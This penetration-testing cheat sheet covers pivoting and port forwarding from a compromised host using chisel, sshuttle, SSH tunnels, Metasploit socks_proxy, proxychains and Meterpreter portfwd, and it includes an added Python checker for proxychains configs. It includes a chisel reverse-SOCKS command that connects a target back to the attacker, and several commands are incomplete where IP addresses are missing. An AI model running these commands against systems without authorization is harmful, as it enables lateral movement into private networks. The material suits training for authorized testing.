Pivoting and Portforwarding

Chisel

# Clone Repository
git clone 'https://github.com/jpillora/chisel.git'

# Build Binary
go build

# Binary is now built and ready to be transferred over to the target system.

Reverse SOCKS proxy

# Attacking Machine
./chisel server -p <Port> --reverse &
./chisel server -p 1337 --reverse &

# On Target Machine
./chisel client <Attacking-IP>:<Port> R:socks &
./chisel client R:socks &

# Then use Proxychains to scan internal networks from the compromised host.

sshuttle

# Authenticate with password
sshuttle -r <User>@<Target-IP> <Target-Subnet> -x <Target-IP>
sshuttle -r user@ -x

# Authenticate with key.
sshuttle -r <User>@<IP> --ssh-cmd "<Command>" <Target-Subnet> -x <Exclude-IP>
sshuttle -r root@ --ssh-cmd "ssh -i id_rsa" -x

SSH Port Forwarding

# Forward RDP from internal host to Attacking Machine on port 1337.
ssh -L <LocalHost>:<Port>:<IP-To-Forward-From>:<Port> <User>@<IP>
ssh -L root@ -i id_rsa

# Forward remote port 80 to local port 80.
ssh atena@ -L 80:
ssh <User>@<IP> -L <Local-Port>:<Remote-Host>:<Remote-Port>

# Dynamic SSH Port Forwarding
ssh -i <id_rsa> <User>@<IP> -D <Proxychains-Port>
ssh -i id_rsa errorcauser@ -D 1080

Metasploit with Proxychains

Change the last line of /etc/proxychains4.conf to the following value: socks5 1080

Then use the following Metasploit module:

use auxiliary/server/socks_proxy

Leave the module options at their defaults:

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)

We can then force applications through the SOCKS proxy by prefixing each command with proxychains.

proxychains nmap <IP> -sT -p 1-10000 -sV -v
proxychains crackmapexec smb -u '' -p ''
proxychains ssh <user>@<IP>
proxychains telnet <IP>

Double Pivot

# /etc/proxychains.conf
# Ensure dynamic_chain is uncommented

tcp_read_time_out 15000
tcp_connect_time_out 8000
socks5 1080  # First Pivot
socks5 1081  # Second Pivot
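The proxy order in /etc/proxychains.conf is what makes the double pivot work: with dynamic_chain, traffic goes through the first listed proxy, then the second. The following parser and sanity checker is an added example, not part of the original notes or of the proxychains project. It reads a proxychains-style config, keeps the [ProxyList] entries in file order, and flags entries that do not match the 'type host port [user pass]' layout (the configuration in these notes was saved with the host fields missing, which is exactly the kind of line proxychains will reject). The sample config embedded below is constructed for the example; its hosts and ports are placeholders.

```python
"""Parse and sanity-check a proxychains.conf-style file (added example)."""

# Constructed sample config; hosts and ports are placeholders, not real values.
SAMPLE_CONF = """\
# proxychains.conf  VER 4.x
dynamic_chain
#strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 1080  # First Pivot
socks5 127.0.0.1 1081  # Second Pivot
socks4 1082            # malformed: host field missing
"""

CHAIN_MODES = ("dynamic_chain", "strict_chain", "random_chain", "round_robin_chain")
PROXY_TYPES = {"http", "socks4", "socks5", "raw"}


def parse_proxychains(text):
    """Return (settings, proxies, problems).

    settings: chain mode and timeouts found before [ProxyList]
    proxies:  list of {type, host, port} dicts in file order (order = chain order)
    problems: descriptions of lines that proxychains would not accept
    """
    settings = {"chain_mode": None}
    proxies, problems = [], []
    in_list = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop full-line and trailing comments
        if not line:
            continue
        if line.lower() == "[proxylist]":
            in_list = True
            continue
        if not in_list:
            key, _, value = line.partition(" ")
            if key in CHAIN_MODES:
                settings["chain_mode"] = key
            elif key in ("tcp_read_time_out", "tcp_connect_time_out"):
                settings[key] = int(value.strip())
            else:
                settings[key] = value.strip() or True  # flags such as proxy_dns
            continue
        parts = line.split()
        # A proxy entry needs at least type, host and a numeric port.
        if len(parts) < 3 or parts[0] not in PROXY_TYPES or not parts[2].isdigit():
            problems.append(
                f"line {lineno}: expected 'type host port [user pass]', got {line!r}"
            )
            continue
        proxies.append({"type": parts[0], "host": parts[1], "port": int(parts[2])})
    if settings["chain_mode"] is None:
        problems.append("no chain mode set (dynamic_chain/strict_chain/...)")
    return settings, proxies, problems


def chain_order(proxies):
    """Render the hop order a connection will take, e.g. for a config review."""
    return " -> ".join(f"{p['type']}://{p['host']}:{p['port']}" for p in proxies)


if __name__ == "__main__":
    settings, proxies, problems = parse_proxychains(SAMPLE_CONF)
    print("mode:", settings["chain_mode"])
    print("chain:", chain_order(proxies))
    for p in problems:
        print("problem:", p)
```

Run it against a real /etc/proxychains.conf by replacing SAMPLE_CONF with the file's contents; an empty problems list and the expected hop order confirm the double-pivot chain is wired as intended.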

Port Forward

Meterpreter can be used to port forward for access to file shares and web servers.

portfwd add -l <LocalPort> -p <RemotePort> -r <TargetIP>
portfwd add -l 3333 -p 3389 -r

With the example command above, connecting to RDP on local port 3333 reaches port 3389 on the target host.

xFreeRDP

Whilst not a direct pivoting technique, using xFreeRDP to share the host's file system gives the attacker an easy route for moving files across systems to further assist with pivoting.

xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share


Chisel: https://github.com/jpillora/chisel/releases/tag/v1.7.6

